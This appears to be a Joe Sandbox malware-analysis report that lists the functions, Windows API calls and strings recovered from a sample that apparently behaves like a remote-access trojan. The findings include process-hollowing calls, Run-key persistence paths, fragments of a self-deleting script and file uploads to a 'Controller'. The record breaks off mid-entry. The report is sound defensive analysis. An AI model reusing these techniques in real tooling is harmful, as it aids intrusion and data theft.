Function 024BE475 Relevance: 27.4, APIs: 18, Instructions: 419COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 024BE49C
_free.LIBCMT ref: 024BE507
_free.LIBCMT ref: 024BE52D
_free.LIBCMT ref: 024BE556
_free.LIBCMT ref: 024BE58E
_free.LIBCMT ref: 024BE5BF
_free.LIBCMT ref: 024BE600
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 024BE681
_free.LIBCMT ref: 024BE69A
_wcschr.LIBVCRUNTIME ref: 024BE6D7
_free.LIBCMT ref: 024BE743
_free.LIBCMT ref: 024BE769
_free.LIBCMT ref: 024BE792
_free.LIBCMT ref: 024BE7C7
_free.LIBCMT ref: 024BE7F8
_free.LIBCMT ref: 024BE839
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 024BE8BE
_free.LIBCMT ref: 024BE8D7

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$___from_strstr_to_strchr_wcschr
String ID:
API String ID: 2719235668-0
Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
Instruction ID: d2855743fefe51c688ae0bbeecdcbd7f4d0232d0745972f1a4f192716580d82e
Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
Instruction Fuzzy Hash: 5DD11771B00600AFDF27AF79D880AEA7BA99F85314F85416FE94597380E7329941CFB1

Function 00411D64 Relevance: 26.7, APIs: 8, Strings: 7, Instructions: 461sleepfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004176B6: CloseHandle.KERNEL32(00401913,00000000,00000000,00401913), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32(?), ref: 004176D5

Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
Sleep.KERNEL32(0000000A,00465324), ref: 00411E8E
Sleep.KERNEL32(0000000A,00465324), ref: 00411F30
DeleteFileW.KERNEL32(00000000), ref: 00411F91
DeleteFileW.KERNEL32(00000000), ref: 00411FC8
DeleteFileW.KERNEL32(00000000), ref: 00412004
Sleep.KERNEL32(000001F4,00465324,00465324,00465324,00401703,?,00000000,00475B70,00473EE8), ref: 0041201E
Sleep.KERNEL32(00000064), ref: 00412060

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Strings

>G, xrefs: 0041227E
>G, xrefs: 00412132
>G, xrefs: 00411DBB, 00411E08, 00411E7C, 00411EAA, 00411F1E
/stext ", xrefs: 00411D77, 00411E19, 00411EBB
HDG, xrefs: 00412316
HDG, xrefs: 004121F2
p[G>G, xrefs: 00411DA1

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Sleep$DeleteFile$CloseHandle$send
String ID: /stext "$HDG$HDG$p[G>G$>G$>G$>G
API String ID: 349593323-3854873656
Opcode ID: 5086cc5ee7f5eceae6a8056d2ae1930fb5dfe8b94f288e07120e28bb5670bb39
Instruction ID: d5b5e6db7a387c7e31a8eb3da60a0f737754113ae17598c3a1c2399e9a3d828e
Opcode Fuzzy Hash: 5086cc5ee7f5eceae6a8056d2ae1930fb5dfe8b94f288e07120e28bb5670bb39
Instruction Fuzzy Hash: 360223315083404AC325FB61D491AEFB7D5AFD4308F50493FF98A931E2EF789A49C69A

Function 024874AC Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 290threadinjectionprocessCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 024875D3
VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 024875EB
GetThreadContext.KERNEL32(?,00000000), ref: 02487601
ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 02487627
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 024876A7
TerminateProcess.KERNEL32(?,00000000), ref: 024876BB
GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 024876F2
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 024877BF
SetThreadContext.KERNEL32(?,00000000), ref: 024877DC
ResumeThread.KERNEL32(?), ref: 024877E9
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02487801
GetCurrentProcess.KERNEL32(?), ref: 0248780C
TerminateProcess.KERNEL32(?,00000000), ref: 02487826
GetLastError.KERNEL32 ref: 0248782E

Strings

ntdll, xrefs: 024874DE, 024874FD, 02487511, 02487525

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
String ID: ntdll
API String ID: 3275803005-3337577438
Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
Instruction ID: 29645b2814e0eb9500b3cb9076ec84135333aee26e1737487be844e4ed355253
Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
Instruction Fuzzy Hash: 52A17A75504304AFD720AF69DC48B6BBBE8FB48349F10082AF689C6261E775E444CF6A

Function 024752A9 Relevance: 26.5, APIs: 9, Strings: 6, Instructions: 280sleepfileprocessCOMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 024752F5

Part of subcall function 024A3736: RtlEnterCriticalSection.NTDLL(00470D18), ref: 024A3740
Part of subcall function 024A3736: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 024A3773

Part of subcall function 024746CF: send.WS2_32(?,00000000,00000000,00000000), ref: 02474764

__Init_thread_footer.LIBCMT ref: 02475332
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 0247544E

Part of subcall function 024A3780: RtlEnterCriticalSection.NTDLL(00470D18), ref: 024A378B
Part of subcall function 024A3780: RtlLeaveCriticalSection.NTDLL(00470D18), ref: 024A37C8

Sleep.KERNEL32(0000012C,00000093,?), ref: 024754A6
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 024754CB
ReadFile.KERNEL32(00000000,?,?,00000000), ref: 024754F8

Part of subcall function 024A3B0C: __onexit.LIBCMT ref: 024A3B12

WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 024755F5
Sleep.KERNEL32(00000064,00000062,00465554), ref: 0247560F
TerminateProcess.KERNEL32(00000000), ref: 02475628

Strings

P\G, xrefs: 024752DF
cmd.exe, xrefs: 0247535C
P\G, xrefs: 0247563E
P\G, xrefs: 02475469
P\G, xrefs: 02475599
P\G, xrefs: 02475565

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterFileInit_thread_footerLeaveProcessSleep$CreateNamedPeekPipeReadTerminateWrite__onexitsend
String ID: P\G$P\G$P\G$P\G$P\G$cmd.exe
API String ID: 121539554-3292008770
Opcode ID: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
Instruction ID: 6637a9524be3404a0a0e6626709d2dfdc04bc4e678483469985ddceaeb906512
Opcode Fuzzy Hash: 797804256bd83e4a27056d5b7dd8b844625091c3a01af072158c3512f2156987
Instruction Fuzzy Hash: E591DA716007046FD715BB25DD50EAE3B6AEB40744F80443FFD29AE2A1EFA498448F69

Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0044E2A0
_free.LIBCMT ref: 0044E2C6
_free.LIBCMT ref: 0044E2EF
_free.LIBCMT ref: 0044E327
_free.LIBCMT ref: 0044E358
_free.LIBCMT ref: 0044E399
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0044E41A
_free.LIBCMT ref: 0044E433
_wcschr.LIBVCRUNTIME ref: 0044E470
_free.LIBCMT ref: 0044E4DC
_free.LIBCMT ref: 0044E502
_free.LIBCMT ref: 0044E52B
_free.LIBCMT ref: 0044E560
_free.LIBCMT ref: 0044E591
_free.LIBCMT ref: 0044E5D2
SetEnvironmentVariableW.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E657
_free.LIBCMT ref: 0044E670

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$EnvironmentVariable$_wcschr
String ID:
API String ID: 3899193279-0
Opcode ID: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
Opcode Fuzzy Hash: 8f41269c20bd7867c5cee3d16b4b1ea97dee87ff38f7f4f352333e12906372dc
Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D

Function 00411C81 Relevance: 24.9, APIs: 9, Strings: 5, Instructions: 408sleepfileCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A

Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00475B70,00000001,?), ref: 0041AB5F

Part of subcall function 004176B6: CloseHandle.KERNEL32(00401913,00000000,00000000,00401913), ref: 004176CC
Part of subcall function 004176B6: CloseHandle.KERNEL32(?), ref: 004176D5

Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
Sleep.KERNEL32(0000000A,00465324), ref: 00411E8E
Sleep.KERNEL32(0000000A,00465324), ref: 00411F30
DeleteFileW.KERNEL32(00000000), ref: 00411F91
DeleteFileW.KERNEL32(00000000), ref: 00411FC8
DeleteFileW.KERNEL32(00000000), ref: 00412004
Sleep.KERNEL32(000001F4,00465324,00465324,00465324,00401703,?,00000000,00475B70,00473EE8), ref: 0041201E
Sleep.KERNEL32(00000064), ref: 00412060

Strings

>G, xrefs: 00412132
>G, xrefs: 00411DBB, 00411E08, 00411E7C, 00411EAA, 00411F1E
/stext ", xrefs: 00411D77, 00411E19, 00411EBB
HDG, xrefs: 004121F2
p[G>G, xrefs: 00411DA1

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcess
String ID: /stext "$HDG$p[G>G$>G$>G
API String ID: 2485855082-2045022169
Opcode ID: 3914094f9acbc47316209507d5b9553a7ef16b097dcddede08140c686295bc73
Instruction ID: 4df0a9b5056a74b7d660d936324a2a290c07640e6de3a3537b66183d498fa78f
Opcode Fuzzy Hash: 3914094f9acbc47316209507d5b9553a7ef16b097dcddede08140c686295bc73
Instruction Fuzzy Hash: B6E144315083414AC324FB61D891BEFB7D5AFD4308F50493EF98A531E2EF785A89C69A

Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
LoadLibraryA.KERNEL32(?), ref: 00413EC8
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
FreeLibrary.KERNEL32(00000000), ref: 00413EEF
LoadLibraryA.KERNEL32(?), ref: 00413F27
GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
FreeLibrary.KERNEL32(00000000), ref: 00413F40
GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
FreeLibrary.KERNEL32(00000000), ref: 00413F66

Strings

getnameinfo, xrefs: 00413E53
\wship6, xrefs: 00413F0F
\ws2_32, xrefs: 00413EB0
getaddrinfo, xrefs: 00413E44, 00413EE2, 00413F33
freeaddrinfo, xrefs: 00413E63

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Library$AddressFreeProc$Load$DirectorySystem
String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
API String ID: 2490988753-744132762
Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE

Function 0247C16B Relevance: 23.0, APIs: 4, Strings: 9, Instructions: 260registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02481900: TerminateProcess.KERNEL32(00000000,?,0247C8E4), ref: 02481910
Part of subcall function 02481900: WaitForSingleObject.KERNEL32(000000FF,?,0247C8E4), ref: 02481923

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0247C27A
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0247C28D

Part of subcall function 0248AD9F: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,02473CA7), ref: 0248ADC6

ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0247C4E7
ExitProcess.KERNEL32 ref: 0247C4EE

Strings

exepath, xrefs: 0247C256
On Error Resume Next, xrefs: 0247C369
fso.DeleteFolder ", xrefs: 0247C45F
`=G, xrefs: 0247C1A6
@CG, xrefs: 0247C233
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0247C20D
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0247C1BC
while fso.FileExists(", xrefs: 0247C39D
pth_unenc, xrefs: 0247C171

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Process$CurrentDeleteExecuteExitFileModuleNameObjectShellSingleTerminateWait
String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$pth_unenc$while fso.FileExists("
API String ID: 508158800-1730539264
Opcode ID: a33fc09c9556ef91ef2cee6c22be68f1294df09e9ea1a498d22c8dae3f6f7800
Instruction ID: 0b4946e7042e991e77e86e2f1e074be01b4c6ec7bf94c46399ef1c33d4fcd32a
Opcode Fuzzy Hash: a33fc09c9556ef91ef2cee6c22be68f1294df09e9ea1a498d22c8dae3f6f7800
Instruction Fuzzy Hash: 598182316043805BC725FB25D850EEF73ABAF91700F10443FE96697295EFA49D09CEA6

Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
RegCloseKey.ADVAPI32(?), ref: 0041BB54

Strings

Publisher, xrefs: 0041B8E6
InstallLocation, xrefs: 0041B911
InstallDate, xrefs: 0041B925
DisplayName, xrefs: 0041B8D1
UninstallString, xrefs: 0041B939
DisplayVersion, xrefs: 0041B8FD
Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 0041B83C

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseEnumOpen
String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
API String ID: 1332880857-3714951968
Opcode ID: e711cd098ebe4aa7a3a0d12df327f6f879f75806db8a1cbd8435f9d26545ebce
Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
Opcode Fuzzy Hash: e711cd098ebe4aa7a3a0d12df327f6f879f75806db8a1cbd8435f9d26545ebce
Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A

Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00444FAD
_free.LIBCMT ref: 00444FC3
_free.LIBCMT ref: 00444FD4
_free.LIBCMT ref: 00444FE5
_free.LIBCMT ref: 00444FFC
GetCPInfo.KERNEL32(?,?), ref: 00445044

Part of subcall function 00451C1B: _free.LIBCMT ref: 00451C86

_free.LIBCMT ref: 004451F0
_free.LIBCMT ref: 00445203
_free.LIBCMT ref: 00445211
_free.LIBCMT ref: 0044521C
_free.LIBCMT ref: 0044525E
_free.LIBCMT ref: 00445266
_free.LIBCMT ref: 0044526E
_free.LIBCMT ref: 00445276
_free.LIBCMT ref: 00445284

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
Opcode Fuzzy Hash: 4f311dc35998d231116b4ef065710eb7bf66da857f64ae236b680615c36f9f73
Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64

Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
__aulldiv.LIBCMT ref: 00407FE9
SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
CloseHandle.KERNEL32(00000000), ref: 00408200
CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
CloseHandle.KERNEL32(00000000), ref: 00408256

Strings

>G, xrefs: 00407E87
SetFilePointerEx error, xrefs: 00408266
ReadFile error, xrefs: 0040822E
Uploading file to Controller: , xrefs: 00408077

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
API String ID: 1884690901-3066803209
Opcode ID: 240764df041a73ec89640159f6c79043c543c235f0f42e6395c3fca756ae4b10
Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
Opcode Fuzzy Hash: 240764df041a73ec89640159f6c79043c543c235f0f42e6395c3fca756ae4b10
Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B

Function 0247C4F5 Relevance: 21.3, APIs: 4, Strings: 8, Instructions: 282registryCOMMON

Download Yara Rule

APIs

Part of subcall function 02481900: TerminateProcess.KERNEL32(00000000,?,0247C8E4), ref: 02481910
Part of subcall function 02481900: WaitForSingleObject.KERNEL32(000000FF,?,0247C8E4), ref: 02481923

GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0247C5F2
RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0247C605

Part of subcall function 0248B7F6: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0248B90C,00000000,00000000,?), ref: 0248B835

ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000000), ref: 0247C899
ExitProcess.KERNEL32 ref: 0247C8A5

Strings

exepath, xrefs: 0247C5CC
On Error Resume Next, xrefs: 0247C68E
fso.DeleteFolder ", xrefs: 0247C780
`=G, xrefs: 0247C530
@CG, xrefs: 0247C5A4
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0247C597
Software\Microsoft\Windows\CurrentVersion\Run\, xrefs: 0247C546
while fso.FileExists(", xrefs: 0247C6C1

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileProcess$CreateDeleteExecuteExitModuleNameObjectShellSingleTerminateWait
String ID: @CG$On Error Resume Next$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$`=G$exepath$fso.DeleteFolder "$while fso.FileExists("
API String ID: 1359289687-1885488838
Opcode ID: 4a4176d209088168477d8c341ab9c6af581995fbe5fc9bf84f99647e44242b62
Instruction ID: f0ea7b176203aeab7022f97be368137264970e25eede6ac973e8f824ee2de016
Opcode Fuzzy Hash: 4a4176d209088168477d8c341ab9c6af581995fbe5fc9bf84f99647e44242b62
Instruction Fuzzy Hash: 1091C7312042805AC724FB26DC90EEF779B9F90700F10443FE966572A5EFA49D49CE66

Function 0247BECE Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 203COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0247BEDC
CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0247BEF5
_wcslen.LIBCMT ref: 0247BFBB
CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0247C043
_wcslen.LIBCMT ref: 0247C09B
CloseHandle.KERNEL32 ref: 0247C102
ShellExecuteW.SHELL32(00000000,0046559C,00000000,00465900,00465900,00000001), ref: 0247C120
ExitProcess.KERNEL32 ref: 0247C137

Strings

C:\Users\user\Desktop\2iH7rqx9rQ.exe, xrefs: 0247BF66, 0247BF6B, 0247BF9E, 0247C053, 0247C058, 0247C05F, 0247C0C0
6, xrefs: 0247BFAF
BG, xrefs: 0247BF1D
BG, xrefs: 0247BF48

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: _wcslen$CreateDirectory$CloseExecuteExitHandleProcessShell
String ID: 6$C:\Users\user\Desktop\2iH7rqx9rQ.exe$BG$BG
API String ID: 3303048660-1381158454
Opcode ID: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
Instruction ID: bb3566351a5939fe9b00c4273990370dbe2ccf25363f84a5f3a493fa277165d5
Opcode Fuzzy Hash: 0ce300c52b2574979d2682925cabc15749f3fad58451f58e2d3683bc22aef4dd
Instruction Fuzzy Hash: 2C51D3202043806BDA14F776EC94FFF239F9B80744F10442FF926A6295EF959945CE7A

Function 00409E48 Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 00409E62

Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00475B70,00473D54,?,00000000,00411F7E,00465324,00465324,00465324,00401703), ref: 0041B633

SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,00000000,00000000,00000000), ref: 0040A049

Strings

XCG, xrefs: 00409ECE
@CG, xrefs: 00409F19
XCG, xrefs: 0040A029
xAG, xrefs: 00409E93
@CG, xrefs: 00409F24
xAG, xrefs: 00409E83

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
String ID: @CG$@CG$XCG$XCG$xAG$xAG
API String ID: 3795512280-3163867910
Opcode ID: ce719bfae7fd6b86c079b550a3ddf827643cff77ee515e4bb05830d606439766
Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
Opcode Fuzzy Hash: ce719bfae7fd6b86c079b550a3ddf827643cff77ee515e4bb05830d606439766
Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

Function 0247A0AF Relevance: 21.2, APIs: 6, Strings: 6, Instructions: 163sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388), ref: 0247A0C9

Part of subcall function 02479FFE: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0247A0D6), ref: 0247A034
Part of subcall function 02479FFE: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0247A0D6), ref: 0247A043
Part of subcall function 02479FFE: Sleep.KERNEL32(00002710,?,?,?,0247A0D6), ref: 0247A070
Part of subcall function 02479FFE: CloseHandle.KERNEL32(00000000,?,?,?,0247A0D6), ref: 0247A077

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0247A105
GetFileAttributesW.KERNEL32(00000000), ref: 0247A116
SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0247A12D
PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0247A1A7

